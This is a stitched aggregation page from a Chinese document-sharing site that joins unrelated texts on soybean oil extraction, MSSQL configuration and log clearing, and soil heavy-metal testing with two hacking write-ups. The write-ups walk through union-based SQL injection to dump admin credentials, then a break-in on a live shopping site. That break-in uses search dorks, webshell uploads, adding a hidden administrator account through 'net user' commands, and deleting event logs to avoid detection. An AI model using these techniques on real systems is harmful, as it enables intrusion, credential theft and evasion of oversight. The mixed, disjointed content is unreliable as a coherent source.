浸出法制取大豆油 发布者:acr 发布时间:2009-7-22 阅读:1 027次 浸出法制油是目前世界上先进的取油技术。自1870年间世以来,经过了百余年的历史,其工艺不断得到改进和完善,到目前为止,已成为世界油脂工业中植物油制取的主要方式。 (一)浸出法制油的基本原理及要素 浸出法制油是利用能溶解油脂的溶剂,通过润湿渗透、分子扩散和对流扩散的作用,将料胚中的油脂浸提出来,然后把由溶剂和脂肪所组成的混合油进行分离,回收溶剂而得到毛油,同样也要将豆粕中的溶剂回收,得到浸出粕。这个过程中,基本要素是溶剂和料胚以及决定浸出效果的浸出方式和工艺参数。 1.溶剂的选择 理想的浸出溶剂应符合以下基本要求: ①能在室温或低温下以任何比例溶解油脂; ②溶剂的选择性要好,即除油脂外,不溶解其它成分。 ③化学性质稳定,对光和水具稳定性,经加热、蒸发与冷却不起化学变化。 ④要求溶剂沸点低,比热小和汽化潜热小,易从粕和油中分离回收。 ⑤溶剂本身无毒性,呈中性,无异味,不污染。 ⑥溶剂与油、粕和设备材料均不发生化学反应。 我国制油工业实际生产中应用最普遍的浸出溶剂有工业已烷或轻汽油等几种脂肪 族碳氢化合物。其中轻汽油是我国目前应用最多的一种溶剂,它是石油原料低沸点分馏产物,符合溶剂上述的基本要求。但最大缺点是易燃易爆,空气中含量达到1.25~4.9%时,有爆炸危险。同时,轻汽油成分复杂,沸点范围较宽。 除此之外,还有丙酮、丁酮、异丙醇、丁烷以及一些复合型溶剂都可用于油脂浸出,有些已在研究试用。 2.对料胚的要求 大豆原料经过预处理,应使其料胚的结构与性质满足浸出工艺要求,才会获得好的浸出效果。 ①细胞破坏程度越彻底越好。 ②料胚薄而结实,粉末度小。这样浸出距离短,溶剂与料胚接触面积大,有利于提高浸效率。大豆直接浸出法要求料胚厚度0.2~0.3mm。 ③水分适宜,浸出溶剂不溶于水,如果料胚中水分高了,内部空隙充满水分, 就会影响到溶剂的渗透和对油脂的溶解作用。所以料胚水分宜低。(<13%,5~7%) ④适当的温度,料胚温度高,油脂粘度低,容易流动,浸出效果好,但应注意,料胚温度不宜超过溶剂的沸点,以免使溶剂汽化。所以料胚温度一般控制在45~55℃,不宜超过60℃。 (二)、浸出制油工艺 1.常规工艺总体流程 一个完整的浸出工艺包括溶剂浸出,混合油分离、湿粕脱溶烘干以及溶剂回收等工序。 浸出法工艺流程图

MSSQL 通过存储过程调用WEB服务解决方法

MSSQL 通过存储过程调用WEB服务解决方法 在数据库的脚本开发过程中,由于需要及时的通过服务中网站中获取及时信息,比如:输入身份证查询考试成绩,输入身份证查询医保卡信息等;SQLSERVER中存储过程来调用外部服务,但是此服务需要sysadmin角色权限。 以下为配置的要求以及源代码: 1, 环境需求设置 开通’ sys.sp_OACreate’以及'Ole Automation Procedures'访问设置: 如果要是SQLSERVER里面实现调用WEB服务、操作文件等相关操作,需通过SQLSERVER的自带组建Ole Automation Procedures,默认情况下这个组件是禁止的。 SQL Server阻止了对组件'Ole Automation Procedures'的过程'sys.sp_OACreate'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure启用'Ole Automation Procedures'。有关启用'Ole Automation Procedures'的详细信息,请参阅SQL Server联机丛书中的"外围应用配置器"。语句已终止。 Ole Automation Procedures选项 使用Ole Automation Procedures选项可指定是否可以在Transact-SQL批处理中实例化OLE Automation对象。也可以使用外围应用配置器工具来配置此选项。有关详细信息,请参阅外围应用配置器。 可以将Ole Automation Procedures选项设置为以下值。 禁用OLE Automation Procedures。SQL Server 2005新实例的默认值。 1 启用OLE Automation Procedures。

重金属形态浸提方法

重金属试验所用到的浸提方法 整理:syl1204 植物样品(根、茎叶、面粉、猪粪样品)重金属全量测定方法: 样品室温下风干,烘干磨细,准确称取0.2500-0.5000g准确0.0001到特芙蓉消煮管,加入5-8ml硝酸和1-3ml过氧化氢消煮,先将温度调到80℃,1.5h;然后调到130℃,2.5h之后,打开盖子赶酸,至含珠状,即粘稠不动,加超纯水使之全部溶解,冲洗内壁,定容至50ml的容量瓶中,过滤,测重金属含量。 土壤样品测定方法(用提取剂提取后,提取液中盐分可能很高,最好稀释后再上机测试,不然会造成仪器进样管堵塞,同时测试时候,测一个样,进样管要在水中多停留一段时间清洗盐分): 1.水提法:取2g过10目筛的盆栽土加入离心管中,再加20ml去离子水, 震荡2h后,4000r/min离心10分钟,过滤,然后AAS法测定Cu含量。 2.DTPA浸提方法(中性-碱性土): 1.967g DTPA(三乙三胺五乙酸)溶于14.92g TEA(三乙醇胺)和少量水中, 再将1.47gCaCl 2·2H 2 O(或1.1098g无水CaCl 2 )溶于水后,一并转入1L容量瓶 中,加水至约950mL,再用6mol/L HCl(即v/v=1/1)溶液调节至pH7.30,最后加水定容,贮于塑料瓶中备用(几个月内不变质). 通过1mm筛的风干土10.00g放入100mL塑料广口瓶中,加DTPA提取剂(其成分为:0.005mol·L-1DTPA—0.01mol·L-1 CaCl2和0.1mol·L-1 TEA,pH=7.3)20.0mL,25℃下180±20r/min振荡2h,过滤。滤液、空白溶液和标准溶液中的Zn、Cu用原子吸收分光光度计测定(最好在48h内完成测试)。 0.1M HCl(酸性土):吸取8.3ml优级纯HCl加水至1L(土:液=1:10). M3提取剂(不分酸碱性):称取20.0g NH4NO3(AR),将其溶于约500ml 水中,加4.00ml NH4F(有毒,腐蚀玻璃)-EDTA储备液,混匀后再加入11.50ml 冰醋酸(17.4mol/L,原液)和0.82ml浓HNO3(15.8mol/L),用水定容至1L,摇匀后储存于塑料瓶中备用,此溶液pH值为2.5±0.1。称取5.00g风干土样(过2mm筛)于100ml塑料瓶中,加入50.00ml M3提取剂,在25±1℃的恒温条件下振荡,振速为200r/min,振荡5min后过滤,滤液承接于干燥的塑料瓶中,用原子吸收分光光度计测定滤液中的铜锌铁锰. 3.美国环境保护部TCLP(Toxicity Characteristic Leaching)法:取1g过10目筛的盆栽土加入离心管中,再加20ml提取剂(土:水比1:20),震荡18小时,0.45um滤纸过滤,AAS测定重金属Cu含量。 提取剂的配制:加5.7ml冰醋酸和64.3ml1mol/lNaOH于500ml去离子水中,定容至1000ml容量瓶,溶液pH4.39±0.05 TCLP法是现在美国法庭所通用的生态环境风险评价方法(Chang E,2001;Bilge A,2002)。此法评价重金属生态环境风险在美国已经开展研究多年,是美国

几种清除MSSQL日志方法

方法一、 1 / 4

2 / 4 方法二、

MS SQL清除日志的命令 如何清除sql server 日志? 设置数据库为简单模式,自动收缩 1.打开查询分析器,输入命令 backup log databasename with no_log 2.再打开企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M 数,直接输入这个数,确定就可以了。 dbcc shrinkfile (databasename_log,truncateonly) 方法三、 1: 删除LOG 第1步:分离数据库企业管理器->服务器->数据库->右键->分离数据库 第2步:删除LOG文件 第3布:附加数据库企业管理器->服务器->数据库->右键->附加数据库 此法生成新的LOG,大小只有500多K 再将此数据库设置自动收缩 方法四、 EXEC sp_detach_db @dbname = 'pubs' EXEC sp_attach_single_file_db @dbname = 'pubs', @physname = 'c:\Program Files\Microsoft SQL Server\MSSQL\Data\pubs.mdf' 方法五、 Use Database_Name Backup Log Database_Name With No_log dbcc shrinkfile (Database_Name_Log,truncateonly) Go 方法六、 直接在查询分析那里执行backup log databasename with no_log 然后回到企业管理器把数据库收缩一下(可能需另外设置属性) 3 / 4

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.360docs.net/doc/b21904772.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常)

然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.360docs.net/doc/b21904772.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图

一次简单但又完整的先拿shell后提权的经历

. 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞,注入的关键字是关键字: inurl:Price.asp?anid=,结合系统本身的后台数据库备份生成目录可以自定义漏洞,轻松可以通过备份xxx.asp的目录,然后上传后缀为jpg的一句话木马,菜刀连之即可得到shell。 但是如果是这样我也不会再写此文,在这些购物网站中,数据最重要的当属减肥丰胸等等网站数据,而且这些网站在优化seo时,肯定设置的关键字也是减肥丰胸之类,那么中文标题之中必有此关键字,那我的想法就产生了,我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点,找到一个注入点https://www.360docs.net/doc/b21904772.html,/Price.asp?anid=xxx,拿去跑表段字段即可,不过也得注意表段是特有的Cnhww。我一般在渗透的时候,也会用jsky和御剑检测站点,在我查看御剑的结果时发现了一个让我欣喜的结果https://www.360docs.net/doc/b21904772.html,/shell.asp,明白的一看便知是先人后门,打开发现是一个小马, (原有小马一被我清除,此图是后来补的),复制大马代码保存,即得到shell。 扫描端口发现,网站开启了

连接3389端口发现可以连接, 尝试简单的命令猜解失败后,决定重新利用shell。查看服务器所支持的组件:

发现可以支持fso和wscript.shell,欣喜往外,ipconfig,net user都支持,查看了当前的账户,有一个默认的administrator管理账户。但是net user admin admin /add,没任何反应,net user 发现并没有添加账户成功,这里很纳闷,决定换思路。把网站翻了个遍,发现了一个数据库的链接文件。 通过代码可知,这里数据库使用了acess和mssql两个,mssql数据库连接账号和密码都已知晓,何不利用数据库连接器试一试,然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本,但皆以失败而告终,都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制,悲哀。。。 就在这个时候,忽然想起来,啊d等软件在mssql数据库sa权限下,皆有列目录和执行dos的权限,何不试试,然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add,但是好久都没回显,很卡的样子,就又换了hdsi,一举成功。 注意这里建立admin是为了方便检测新否已经建立账户,要做一个好的后门,是要做克隆账户的。心情愉悦的3389连之,为了防止管理员net user查到新建的账户,我建立了隐藏账户,即是admin$,这种账户在cmd中时发现不了的,但是查询用户组还是一览无遗。我当时没在意觉得没什么,然后速度在日志查看器中删除了所有日志,(这个我也不想,不过好似没法删除单一的登陆记录,请大牛指点指点),正在这时,忽然事件查看器中多了一条登录审核信息,我一看管理员来了,吓得我急忙注销电脑,灰溜溜的跑了。。。。 大约过了1个小时吧,我又重新登录,账号还在,管理员确实很马虎额,不过自己可不能再大意了,遂决定建立克隆账户。 然后就用shell上传aio.exe文件,竟然失败,然后用菜刀上传也是失败,真是无语。看来是权限不够,忽然想到3389现在不是支持复制粘贴吗?忽然觉得思路就是被逼出来的,

相关文档
最新文档